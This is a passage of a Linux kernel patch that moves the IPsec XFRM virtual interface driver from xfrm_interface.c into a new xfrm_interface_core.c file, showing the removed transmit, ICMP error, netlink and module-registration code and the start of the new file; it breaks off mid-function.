+-	}
+-	dev_sw_netstats_rx_add(dev, skb->len);
+-
+-	return 0;
+-}
+-
+-static int
+-xfrmi_xmit2(struct sk_buff *skb, struct net_device *dev, struct flowi *fl)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device_stats *stats = &xi->dev->stats;
+-	struct dst_entry *dst = skb_dst(skb);
+-	unsigned int length = skb->len;
+-	struct net_device *tdev;
+-	struct xfrm_state *x;
+-	int err = -1;
+-	u32 if_id;
+-	int mtu;
+-
+-	if (xi->p.collect_md) {
+-		struct xfrm_md_info *md_info = skb_xfrm_md_info(skb);
+-
+-		if (unlikely(!md_info))
+-			return -EINVAL;
+-
+-		if_id = md_info->if_id;
+-		fl->flowi_oif = md_info->link;
+-	} else {
+-		if_id = xi->p.if_id;
+-	}
+-
+-	dst_hold(dst);
+-	dst = xfrm_lookup_with_ifid(xi->net, dst, fl, NULL, 0, if_id);
+-	if (IS_ERR(dst)) {
+-		err = PTR_ERR(dst);
+-		dst = NULL;
+-		goto tx_err_link_failure;
+-	}
+-
+-	x = dst->xfrm;
+-	if (!x)
+-		goto tx_err_link_failure;
+-
+-	if (x->if_id != if_id)
+-		goto tx_err_link_failure;
+-
+-	tdev = dst->dev;
+-
+-	if (tdev == dev) {
+-		stats->collisions++;
+-		net_warn_ratelimited("%s: Local routing loop detected!\n",
+-				     dev->name);
+-		goto tx_err_dst_release;
+-	}
+-
+-	mtu = dst_mtu(dst);
+-	if ((!skb_is_gso(skb) && skb->len > mtu) ||
+-	    (skb_is_gso(skb) && !skb_gso_validate_network_len(skb, mtu))) {
+-		skb_dst_update_pmtu_no_confirm(skb, mtu);
+-
+-		if (skb->protocol == htons(ETH_P_IPV6)) {
+-			if (mtu < IPV6_MIN_MTU)
+-				mtu = IPV6_MIN_MTU;
+-
+-			if (skb->len > 1280)
+-				icmpv6_ndo_send(skb, ICMPV6_PKT_TOOBIG, 0, mtu);
+-			else
+-				goto xmit;
+-		} else {
+-			if (!(ip_hdr(skb)->frag_off & htons(IP_DF)))
+-				goto xmit;
+-			icmp_ndo_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED,
+-				      htonl(mtu));
+-		}
+-
+-		dst_release(dst);
+-		return -EMSGSIZE;
+-	}
+-
+-xmit:
+-	xfrmi_scrub_packet(skb, !net_eq(xi->net, dev_net(dev)));
+-	skb_dst_set(skb, dst);
+-	skb->dev = tdev;
+-
+-	err = dst_output(xi->net, skb->sk, skb);
+-	if (net_xmit_eval(err) == 0) {
+-		dev_sw_netstats_tx_add(dev, 1, length);
+-	} else {
+-		stats->tx_errors++;
+-		stats->tx_aborted_errors++;
+-	}
+-
+-	return 0;
+-tx_err_link_failure:
+-	stats->tx_carrier_errors++;
+-	dst_link_failure(skb);
+-tx_err_dst_release:
+-	dst_release(dst);
+-	return err;
+-}
+-
+-static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device_stats *stats = &xi->dev->stats;
+-	struct dst_entry *dst = skb_dst(skb);
+-	struct flowi fl;
+-	int ret;
+-
+-	memset(&fl, 0, sizeof(fl));
+-
+-	switch (skb->protocol) {
+-	case htons(ETH_P_IPV6):
+-		xfrm_decode_session(skb, &fl, AF_INET6);
+-		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
+-		if (!dst) {
+-			fl.u.ip6.flowi6_oif = dev->ifindex;
+-			fl.u.ip6.flowi6_flags |= FLOWI_FLAG_ANYSRC;
+-			dst = ip6_route_output(dev_net(dev), NULL, &fl.u.ip6);
+-			if (dst->error) {
+-				dst_release(dst);
+-				stats->tx_carrier_errors++;
+-				goto tx_err;
+-			}
+-			skb_dst_set(skb, dst);
+-		}
+-		break;
+-	case htons(ETH_P_IP):
+-		xfrm_decode_session(skb, &fl, AF_INET);
+-		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
+-		if (!dst) {
+-			struct rtable *rt;
+-
+-			fl.u.ip4.flowi4_oif = dev->ifindex;
+-			fl.u.ip4.flowi4_flags |= FLOWI_FLAG_ANYSRC;
+-			rt = __ip_route_output_key(dev_net(dev), &fl.u.ip4);
+-			if (IS_ERR(rt)) {
+-				stats->tx_carrier_errors++;
+-				goto tx_err;
+-			}
+-			skb_dst_set(skb, &rt->dst);
+-		}
+-		break;
+-	default:
+-		goto tx_err;
+-	}
+-
+-	fl.flowi_oif = xi->p.link;
+-
+-	ret = xfrmi_xmit2(skb, dev, &fl);
+-	if (ret < 0)
+-		goto tx_err;
+-
+-	return NETDEV_TX_OK;
+-
+-tx_err:
+-	stats->tx_errors++;
+-	stats->tx_dropped++;
+-	kfree_skb(skb);
+-	return NETDEV_TX_OK;
+-}
+-
+-static int xfrmi4_err(struct sk_buff *skb, u32 info)
+-{
+-	const struct iphdr *iph = (const struct iphdr *)skb->data;
+-	struct net *net = dev_net(skb->dev);
+-	int protocol = iph->protocol;
+-	struct ip_comp_hdr *ipch;
+-	struct ip_esp_hdr *esph;
+-	struct ip_auth_hdr *ah ;
+-	struct xfrm_state *x;
+-	struct xfrm_if *xi;
+-	__be32 spi;
+-
+-	switch (protocol) {
+-	case IPPROTO_ESP:
+-		esph = (struct ip_esp_hdr *)(skb->data+(iph->ihl<<2));
+-		spi = esph->spi;
+-		break;
+-	case IPPROTO_AH:
+-		ah = (struct ip_auth_hdr *)(skb->data+(iph->ihl<<2));
+-		spi = ah->spi;
+-		break;
+-	case IPPROTO_COMP:
+-		ipch = (struct ip_comp_hdr *)(skb->data+(iph->ihl<<2));
+-		spi = htonl(ntohs(ipch->cpi));
+-		break;
+-	default:
+-		return 0;
+-	}
+-
+-	switch (icmp_hdr(skb)->type) {
+-	case ICMP_DEST_UNREACH:
+-		if (icmp_hdr(skb)->code != ICMP_FRAG_NEEDED)
+-			return 0;
+-		break;
+-	case ICMP_REDIRECT:
+-		break;
+-	default:
+-		return 0;
+-	}
+-
+-	x = xfrm_state_lookup(net, skb->mark, (const xfrm_address_t *)&iph->daddr,
+-			      spi, protocol, AF_INET);
+-	if (!x)
+-		return 0;
+-
+-	xi = xfrmi_lookup(net, x);
+-	if (!xi) {
+-		xfrm_state_put(x);
+-		return -1;
+-	}
+-
+-	if (icmp_hdr(skb)->type == ICMP_DEST_UNREACH)
+-		ipv4_update_pmtu(skb, net, info, 0, protocol);
+-	else
+-		ipv4_redirect(skb, net, 0, protocol);
+-	xfrm_state_put(x);
+-
+-	return 0;
+-}
+-
+-static int xfrmi6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+-		    u8 type, u8 code, int offset, __be32 info)
+-{
+-	const struct ipv6hdr *iph = (const struct ipv6hdr *)skb->data;
+-	struct net *net = dev_net(skb->dev);
+-	int protocol = iph->nexthdr;
+-	struct ip_comp_hdr *ipch;
+-	struct ip_esp_hdr *esph;
+-	struct ip_auth_hdr *ah;
+-	struct xfrm_state *x;
+-	struct xfrm_if *xi;
+-	__be32 spi;
+-
+-	switch (protocol) {
+-	case IPPROTO_ESP:
+-		esph = (struct ip_esp_hdr *)(skb->data + offset);
+-		spi = esph->spi;
+-		break;
+-	case IPPROTO_AH:
+-		ah = (struct ip_auth_hdr *)(skb->data + offset);
+-		spi = ah->spi;
+-		break;
+-	case IPPROTO_COMP:
+-		ipch = (struct ip_comp_hdr *)(skb->data + offset);
+-		spi = htonl(ntohs(ipch->cpi));
+-		break;
+-	default:
+-		return 0;
+-	}
+-
+-	if (type != ICMPV6_PKT_TOOBIG &&
+-	    type != NDISC_REDIRECT)
+-		return 0;
+-
+-	x = xfrm_state_lookup(net, skb->mark, (const xfrm_address_t *)&iph->daddr,
+-			      spi, protocol, AF_INET6);
+-	if (!x)
+-		return 0;
+-
+-	xi = xfrmi_lookup(net, x);
+-	if (!xi) {
+-		xfrm_state_put(x);
+-		return -1;
+-	}
+-
+-	if (type == NDISC_REDIRECT)
+-		ip6_redirect(skb, net, skb->dev->ifindex, 0,
+-			     sock_net_uid(net, NULL));
+-	else
+-		ip6_update_pmtu(skb, net, info, 0, 0, sock_net_uid(net, NULL));
+-	xfrm_state_put(x);
+-
+-	return 0;
+-}
+-
+-static int xfrmi_change(struct xfrm_if *xi, const struct xfrm_if_parms *p)
+-{
+-	if (xi->p.link != p->link)
+-		return -EINVAL;
+-
+-	xi->p.if_id = p->if_id;
+-
+-	return 0;
+-}
+-
+-static int xfrmi_update(struct xfrm_if *xi, struct xfrm_if_parms *p)
+-{
+-	struct net *net = xi->net;
+-	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-	int err;
+-
+-	xfrmi_unlink(xfrmn, xi);
+-	synchronize_net();
+-	err = xfrmi_change(xi, p);
+-	xfrmi_link(xfrmn, xi);
+-	netdev_state_change(xi->dev);
+-	return err;
+-}
+-
+-static int xfrmi_get_iflink(const struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-
+-	return xi->p.link;
+-}
+-
+-static const struct net_device_ops xfrmi_netdev_ops = {
+-	.ndo_init	= xfrmi_dev_init,
+-	.ndo_uninit	= xfrmi_dev_uninit,
+-	.ndo_start_xmit = xfrmi_xmit,
+-	.ndo_get_stats64 = dev_get_tstats64,
+-	.ndo_get_iflink = xfrmi_get_iflink,
+-};
+-
+-static void xfrmi_dev_setup(struct net_device *dev)
+-{
+-	dev->netdev_ops 	= &xfrmi_netdev_ops;
+-	dev->header_ops		= &ip_tunnel_header_ops;
+-	dev->type		= ARPHRD_NONE;
+-	dev->mtu		= ETH_DATA_LEN;
+-	dev->min_mtu		= ETH_MIN_MTU;
+-	dev->max_mtu		= IP_MAX_MTU;
+-	dev->flags 		= IFF_NOARP;
+-	dev->needs_free_netdev	= true;
+-	dev->priv_destructor	= xfrmi_dev_free;
+-	netif_keep_dst(dev);
+-
+-	eth_broadcast_addr(dev->broadcast);
+-}
+-
+-#define XFRMI_FEATURES (NETIF_F_SG |		\
+-			NETIF_F_FRAGLIST |	\
+-			NETIF_F_GSO_SOFTWARE |	\
+-			NETIF_F_HW_CSUM)
+-
+-static int xfrmi_dev_init(struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device *phydev = __dev_get_by_index(xi->net, xi->p.link);
+-	int err;
+-
+-	dev->tstats = netdev_alloc_pcpu_stats(struct pcpu_sw_netstats);
+-	if (!dev->tstats)
+-		return -ENOMEM;
+-
+-	err = gro_cells_init(&xi->gro_cells, dev);
+-	if (err) {
+-		free_percpu(dev->tstats);
+-		return err;
+-	}
+-
+-	dev->features |= NETIF_F_LLTX;
+-	dev->features |= XFRMI_FEATURES;
+-	dev->hw_features |= XFRMI_FEATURES;
+-
+-	if (phydev) {
+-		dev->needed_headroom = phydev->needed_headroom;
+-		dev->needed_tailroom = phydev->needed_tailroom;
+-
+-		if (is_zero_ether_addr(dev->dev_addr))
+-			eth_hw_addr_inherit(dev, phydev);
+-		if (is_zero_ether_addr(dev->broadcast))
+-			memcpy(dev->broadcast, phydev->broadcast,
+-			       dev->addr_len);
+-	} else {
+-		eth_hw_addr_random(dev);
+-		eth_broadcast_addr(dev->broadcast);
+-	}
+-
+-	return 0;
+-}
+-
+-static int xfrmi_validate(struct nlattr *tb[], struct nlattr *data[],
+-			 struct netlink_ext_ack *extack)
+-{
+-	return 0;
+-}
+-
+-static void xfrmi_netlink_parms(struct nlattr *data[],
+-			       struct xfrm_if_parms *parms)
+-{
+-	memset(parms, 0, sizeof(*parms));
+-
+-	if (!data)
+-		return;
+-
+-	if (data[IFLA_XFRM_LINK])
+-		parms->link = nla_get_u32(data[IFLA_XFRM_LINK]);
+-
+-	if (data[IFLA_XFRM_IF_ID])
+-		parms->if_id = nla_get_u32(data[IFLA_XFRM_IF_ID]);
+-
+-	if (data[IFLA_XFRM_COLLECT_METADATA])
+-		parms->collect_md = true;
+-}
+-
+-static int xfrmi_newlink(struct net *src_net, struct net_device *dev,
+-			struct nlattr *tb[], struct nlattr *data[],
+-			struct netlink_ext_ack *extack)
+-{
+-	struct net *net = dev_net(dev);
+-	struct xfrm_if_parms p = {};
+-	struct xfrm_if *xi;
+-	int err;
+-
+-	xfrmi_netlink_parms(data, &p);
+-	if (p.collect_md) {
+-		struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-
+-		if (p.link || p.if_id) {
+-			NL_SET_ERR_MSG(extack, "link and if_id must be zero");
+-			return -EINVAL;
+-		}
+-
+-		if (rtnl_dereference(xfrmn->collect_md_xfrmi))
+-			return -EEXIST;
+-
+-	} else {
+-		if (!p.if_id) {
+-			NL_SET_ERR_MSG(extack, "if_id must be non zero");
+-			return -EINVAL;
+-		}
+-
+-		xi = xfrmi_locate(net, &p);
+-		if (xi)
+-			return -EEXIST;
+-	}
+-
+-	xi = netdev_priv(dev);
+-	xi->p = p;
+-	xi->net = net;
+-	xi->dev = dev;
+-
+-	err = xfrmi_create(dev);
+-	return err;
+-}
+-
+-static void xfrmi_dellink(struct net_device *dev, struct list_head *head)
+-{
+-	unregister_netdevice_queue(dev, head);
+-}
+-
+-static int xfrmi_changelink(struct net_device *dev, struct nlattr *tb[],
+-			   struct nlattr *data[],
+-			   struct netlink_ext_ack *extack)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net *net = xi->net;
+-	struct xfrm_if_parms p = {};
+-
+-	xfrmi_netlink_parms(data, &p);
+-	if (!p.if_id) {
+-		NL_SET_ERR_MSG(extack, "if_id must be non zero");
+-		return -EINVAL;
+-	}
+-
+-	if (p.collect_md) {
+-		NL_SET_ERR_MSG(extack, "collect_md can't be changed");
+-		return -EINVAL;
+-	}
+-
+-	xi = xfrmi_locate(net, &p);
+-	if (!xi) {
+-		xi = netdev_priv(dev);
+-	} else {
+-		if (xi->dev != dev)
+-			return -EEXIST;
+-		if (xi->p.collect_md) {
+-			NL_SET_ERR_MSG(extack,
+-				       "device can't be changed to collect_md");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	return xfrmi_update(xi, &p);
+-}
+-
+-static size_t xfrmi_get_size(const struct net_device *dev)
+-{
+-	return
+-		/* IFLA_XFRM_LINK */
+-		nla_total_size(4) +
+-		/* IFLA_XFRM_IF_ID */
+-		nla_total_size(4) +
+-		/* IFLA_XFRM_COLLECT_METADATA */
+-		nla_total_size(0) +
+-		0;
+-}
+-
+-static int xfrmi_fill_info(struct sk_buff *skb, const struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct xfrm_if_parms *parm = &xi->p;
+-
+-	if (nla_put_u32(skb, IFLA_XFRM_LINK, parm->link) ||
+-	    nla_put_u32(skb, IFLA_XFRM_IF_ID, parm->if_id) ||
+-	    (xi->p.collect_md && nla_put_flag(skb, IFLA_XFRM_COLLECT_METADATA)))
+-		goto nla_put_failure;
+-	return 0;
+-
+-nla_put_failure:
+-	return -EMSGSIZE;
+-}
+-
+-static struct net *xfrmi_get_link_net(const struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-
+-	return xi->net;
+-}
+-
+-static const struct nla_policy xfrmi_policy[IFLA_XFRM_MAX + 1] = {
+-	[IFLA_XFRM_UNSPEC]		= { .strict_start_type = IFLA_XFRM_COLLECT_METADATA },
+-	[IFLA_XFRM_LINK]		= { .type = NLA_U32 },
+-	[IFLA_XFRM_IF_ID]		= { .type = NLA_U32 },
+-	[IFLA_XFRM_COLLECT_METADATA]	= { .type = NLA_FLAG },
+-};
+-
+-static struct rtnl_link_ops xfrmi_link_ops __read_mostly = {
+-	.kind		= "xfrm",
+-	.maxtype	= IFLA_XFRM_MAX,
+-	.policy		= xfrmi_policy,
+-	.priv_size	= sizeof(struct xfrm_if),
+-	.setup		= xfrmi_dev_setup,
+-	.validate	= xfrmi_validate,
+-	.newlink	= xfrmi_newlink,
+-	.dellink	= xfrmi_dellink,
+-	.changelink	= xfrmi_changelink,
+-	.get_size	= xfrmi_get_size,
+-	.fill_info	= xfrmi_fill_info,
+-	.get_link_net	= xfrmi_get_link_net,
+-};
+-
+-static void __net_exit xfrmi_exit_batch_net(struct list_head *net_exit_list)
+-{
+-	struct net *net;
+-	LIST_HEAD(list);
+-
+-	rtnl_lock();
+-	list_for_each_entry(net, net_exit_list, exit_list) {
+-		struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-		struct xfrm_if __rcu **xip;
+-		struct xfrm_if *xi;
+-		int i;
+-
+-		for (i = 0; i < XFRMI_HASH_SIZE; i++) {
+-			for (xip = &xfrmn->xfrmi[i];
+-			     (xi = rtnl_dereference(*xip)) != NULL;
+-			     xip = &xi->next)
+-				unregister_netdevice_queue(xi->dev, &list);
+-		}
+-		xi = rtnl_dereference(xfrmn->collect_md_xfrmi);
+-		if (xi)
+-			unregister_netdevice_queue(xi->dev, &list);
+-	}
+-	unregister_netdevice_many(&list);
+-	rtnl_unlock();
+-}
+-
+-static struct pernet_operations xfrmi_net_ops = {
+-	.exit_batch = xfrmi_exit_batch_net,
+-	.id   = &xfrmi_net_id,
+-	.size = sizeof(struct xfrmi_net),
+-};
+-
+-static struct xfrm6_protocol xfrmi_esp6_protocol __read_mostly = {
+-	.handler	=	xfrm6_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	10,
+-};
+-
+-static struct xfrm6_protocol xfrmi_ah6_protocol __read_mostly = {
+-	.handler	=	xfrm6_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	10,
+-};
+-
+-static struct xfrm6_protocol xfrmi_ipcomp6_protocol __read_mostly = {
+-	.handler	=	xfrm6_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	10,
+-};
+-
+-#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
+-static int xfrmi6_rcv_tunnel(struct sk_buff *skb)
+-{
+-	const xfrm_address_t *saddr;
+-	__be32 spi;
+-
+-	saddr = (const xfrm_address_t *)&ipv6_hdr(skb)->saddr;
+-	spi = xfrm6_tunnel_spi_lookup(dev_net(skb->dev), saddr);
+-
+-	return xfrm6_rcv_spi(skb, IPPROTO_IPV6, spi, NULL);
+-}
+-
+-static struct xfrm6_tunnel xfrmi_ipv6_handler __read_mostly = {
+-	.handler	=	xfrmi6_rcv_tunnel,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	2,
+-};
+-
+-static struct xfrm6_tunnel xfrmi_ip6ip_handler __read_mostly = {
+-	.handler	=	xfrmi6_rcv_tunnel,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	2,
+-};
+-#endif
+-
+-static struct xfrm4_protocol xfrmi_esp4_protocol __read_mostly = {
+-	.handler	=	xfrm4_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	10,
+-};
+-
+-static struct xfrm4_protocol xfrmi_ah4_protocol __read_mostly = {
+-	.handler	=	xfrm4_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	10,
+-};
+-
+-static struct xfrm4_protocol xfrmi_ipcomp4_protocol __read_mostly = {
+-	.handler	=	xfrm4_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	10,
+-};
+-
+-#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
+-static int xfrmi4_rcv_tunnel(struct sk_buff *skb)
+-{
+-	return xfrm4_rcv_spi(skb, IPPROTO_IPIP, ip_hdr(skb)->saddr);
+-}
+-
+-static struct xfrm_tunnel xfrmi_ipip_handler __read_mostly = {
+-	.handler	=	xfrmi4_rcv_tunnel,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	3,
+-};
+-
+-static struct xfrm_tunnel xfrmi_ipip6_handler __read_mostly = {
+-	.handler	=	xfrmi4_rcv_tunnel,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	2,
+-};
+-#endif
+-
+-static int __init xfrmi4_init(void)
+-{
+-	int err;
+-
+-	err = xfrm4_protocol_register(&xfrmi_esp4_protocol, IPPROTO_ESP);
+-	if (err < 0)
+-		goto xfrm_proto_esp_failed;
+-	err = xfrm4_protocol_register(&xfrmi_ah4_protocol, IPPROTO_AH);
+-	if (err < 0)
+-		goto xfrm_proto_ah_failed;
+-	err = xfrm4_protocol_register(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
+-	if (err < 0)
+-		goto xfrm_proto_comp_failed;
+-#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
+-	err = xfrm4_tunnel_register(&xfrmi_ipip_handler, AF_INET);
+-	if (err < 0)
+-		goto xfrm_tunnel_ipip_failed;
+-	err = xfrm4_tunnel_register(&xfrmi_ipip6_handler, AF_INET6);
+-	if (err < 0)
+-		goto xfrm_tunnel_ipip6_failed;
+-#endif
+-
+-	return 0;
+-
+-#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
+-xfrm_tunnel_ipip6_failed:
+-	xfrm4_tunnel_deregister(&xfrmi_ipip_handler, AF_INET);
+-xfrm_tunnel_ipip_failed:
+-	xfrm4_protocol_deregister(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
+-#endif
+-xfrm_proto_comp_failed:
+-	xfrm4_protocol_deregister(&xfrmi_ah4_protocol, IPPROTO_AH);
+-xfrm_proto_ah_failed:
+-	xfrm4_protocol_deregister(&xfrmi_esp4_protocol, IPPROTO_ESP);
+-xfrm_proto_esp_failed:
+-	return err;
+-}
+-
+-static void xfrmi4_fini(void)
+-{
+-#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
+-	xfrm4_tunnel_deregister(&xfrmi_ipip6_handler, AF_INET6);
+-	xfrm4_tunnel_deregister(&xfrmi_ipip_handler, AF_INET);
+-#endif
+-	xfrm4_protocol_deregister(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
+-	xfrm4_protocol_deregister(&xfrmi_ah4_protocol, IPPROTO_AH);
+-	xfrm4_protocol_deregister(&xfrmi_esp4_protocol, IPPROTO_ESP);
+-}
+-
+-static int __init xfrmi6_init(void)
+-{
+-	int err;
+-
+-	err = xfrm6_protocol_register(&xfrmi_esp6_protocol, IPPROTO_ESP);
+-	if (err < 0)
+-		goto xfrm_proto_esp_failed;
+-	err = xfrm6_protocol_register(&xfrmi_ah6_protocol, IPPROTO_AH);
+-	if (err < 0)
+-		goto xfrm_proto_ah_failed;
+-	err = xfrm6_protocol_register(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
+-	if (err < 0)
+-		goto xfrm_proto_comp_failed;
+-#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
+-	err = xfrm6_tunnel_register(&xfrmi_ipv6_handler, AF_INET6);
+-	if (err < 0)
+-		goto xfrm_tunnel_ipv6_failed;
+-	err = xfrm6_tunnel_register(&xfrmi_ip6ip_handler, AF_INET);
+-	if (err < 0)
+-		goto xfrm_tunnel_ip6ip_failed;
+-#endif
+-
+-	return 0;
+-
+-#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
+-xfrm_tunnel_ip6ip_failed:
+-	xfrm6_tunnel_deregister(&xfrmi_ipv6_handler, AF_INET6);
+-xfrm_tunnel_ipv6_failed:
+-	xfrm6_protocol_deregister(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
+-#endif
+-xfrm_proto_comp_failed:
+-	xfrm6_protocol_deregister(&xfrmi_ah6_protocol, IPPROTO_AH);
+-xfrm_proto_ah_failed:
+-	xfrm6_protocol_deregister(&xfrmi_esp6_protocol, IPPROTO_ESP);
+-xfrm_proto_esp_failed:
+-	return err;
+-}
+-
+-static void xfrmi6_fini(void)
+-{
+-#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
+-	xfrm6_tunnel_deregister(&xfrmi_ip6ip_handler, AF_INET);
+-	xfrm6_tunnel_deregister(&xfrmi_ipv6_handler, AF_INET6);
+-#endif
+-	xfrm6_protocol_deregister(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
+-	xfrm6_protocol_deregister(&xfrmi_ah6_protocol, IPPROTO_AH);
+-	xfrm6_protocol_deregister(&xfrmi_esp6_protocol, IPPROTO_ESP);
+-}
+-
+-static const struct xfrm_if_cb xfrm_if_cb = {
+-	.decode_session =	xfrmi_decode_session,
+-};
+-
+-static int __init xfrmi_init(void)
+-{
+-	const char *msg;
+-	int err;
+-
+-	pr_info("IPsec XFRM device driver\n");
+-
+-	msg = "tunnel device";
+-	err = register_pernet_device(&xfrmi_net_ops);
+-	if (err < 0)
+-		goto pernet_dev_failed;
+-
+-	msg = "xfrm4 protocols";
+-	err = xfrmi4_init();
+-	if (err < 0)
+-		goto xfrmi4_failed;
+-
+-	msg = "xfrm6 protocols";
+-	err = xfrmi6_init();
+-	if (err < 0)
+-		goto xfrmi6_failed;
+-
+-
+-	msg = "netlink interface";
+-	err = rtnl_link_register(&xfrmi_link_ops);
+-	if (err < 0)
+-		goto rtnl_link_failed;
+-
+-	lwtunnel_encap_add_ops(&xfrmi_encap_ops, LWTUNNEL_ENCAP_XFRM);
+-
+-	xfrm_if_register_cb(&xfrm_if_cb);
+-
+-	return err;
+-
+-rtnl_link_failed:
+-	xfrmi6_fini();
+-xfrmi6_failed:
+-	xfrmi4_fini();
+-xfrmi4_failed:
+-	unregister_pernet_device(&xfrmi_net_ops);
+-pernet_dev_failed:
+-	pr_err("xfrmi init: failed to register %s\n", msg);
+-	return err;
+-}
+-
+-static void __exit xfrmi_fini(void)
+-{
+-	xfrm_if_unregister_cb();
+-	lwtunnel_encap_del_ops(&xfrmi_encap_ops, LWTUNNEL_ENCAP_XFRM);
+-	rtnl_link_unregister(&xfrmi_link_ops);
+-	xfrmi4_fini();
+-	xfrmi6_fini();
+-	unregister_pernet_device(&xfrmi_net_ops);
+-}
+-
+-module_init(xfrmi_init);
+-module_exit(xfrmi_fini);
+-MODULE_LICENSE("GPL");
+-MODULE_ALIAS_RTNL_LINK("xfrm");
+-MODULE_ALIAS_NETDEV("xfrm0");
+-MODULE_AUTHOR("Steffen Klassert");
+-MODULE_DESCRIPTION("XFRM virtual interface");
+diff --git a/net/xfrm/xfrm_interface_core.c b/net/xfrm/xfrm_interface_core.c
+new file mode 100644
+index 0000000000000..94a3609548b11
+--- /dev/null
++++ b/net/xfrm/xfrm_interface_core.c
+@@ -0,0 +1,1244 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *	XFRM virtual interface
++ *
++ *	Copyright (C) 2018 secunet Security Networks AG
++ *
++ *	Author:
++ *	Steffen Klassert <steffen.klassert@secunet.com>
++ */
++
++#include <linux/module.h>
++#include <linux/capability.h>
++#include <linux/errno.h>
++#include <linux/types.h>
++#include <linux/sockios.h>
++#include <linux/icmp.h>
++#include <linux/if.h>
++#include <linux/in.h>
++#include <linux/ip.h>
++#include <linux/net.h>
++#include <linux/in6.h>
++#include <linux/netdevice.h>
++#include <linux/if_link.h>
++#include <linux/if_arp.h>
++#include <linux/icmpv6.h>
++#include <linux/init.h>
++#include <linux/route.h>
++#include <linux/rtnetlink.h>
++#include <linux/netfilter_ipv6.h>
++#include <linux/slab.h>
++#include <linux/hash.h>
++
++#include <linux/uaccess.h>
++#include <linux/atomic.h>
++
++#include <net/icmp.h>
++#include <net/ip.h>
++#include <net/ipv6.h>
++#include <net/ip6_route.h>
++#include <net/ip_tunnels.h>
++#include <net/addrconf.h>
++#include <net/xfrm.h>
++#include <net/net_namespace.h>
++#include <net/dst_metadata.h>
++#include <net/netns/generic.h>
++#include <linux/etherdevice.h>
++
++static int xfrmi_dev_init(struct net_device *dev);
++static void xfrmi_dev_setup(struct net_device *dev);
++static struct rtnl_link_ops xfrmi_link_ops __read_mostly;
++static unsigned int xfrmi_net_id __read_mostly;
++static const struct net_device_ops xfrmi_netdev_ops;
++
++#define XFRMI_HASH_BITS	8
++#define XFRMI_HASH_SIZE	BIT(XFRMI_HASH_BITS)
++
++struct xfrmi_net {
++	/* lists for storing interfaces in use */
++	struct xfrm_if __rcu *xfrmi[XFRMI_HASH_SIZE];
++	struct xfrm_if __rcu *collect_md_xfrmi;
++};
++
++static const struct nla_policy xfrm_lwt_policy[LWT_XFRM_MAX + 1] = {
++	[LWT_XFRM_IF_ID]	= NLA_POLICY_MIN(NLA_U32, 1),
++	[LWT_XFRM_LINK]		= NLA_POLICY_MIN(NLA_U32, 1),
++};
++
++static void xfrmi_destroy_state(struct lwtunnel_state *lwt)
++{
++}
++
++static int xfrmi_build_state(struct net *net, struct nlattr *nla,
++			     unsigned int family, const void *cfg,
++			     struct lwtunnel_state **ts,
++			     struct netlink_ext_ack *extack)
++{
++	struct nlattr *tb[LWT_XFRM_MAX + 1];
++	struct lwtunnel_state *new_state;
++	struct xfrm_md_info *info;
++	int ret;
++
++	ret = nla_parse_nested(tb, LWT_XFRM_MAX, nla, xfrm_lwt_policy, extack);
++	if (ret < 0)
++		return ret;
++
++	if (!tb[LWT_XFRM_IF_ID]) {
++		NL_SET_ERR_MSG(extack, "if_id must be set");
++		return -EINVAL;
++	}
++
++	new_state = lwtunnel_state_alloc(sizeof(*info));
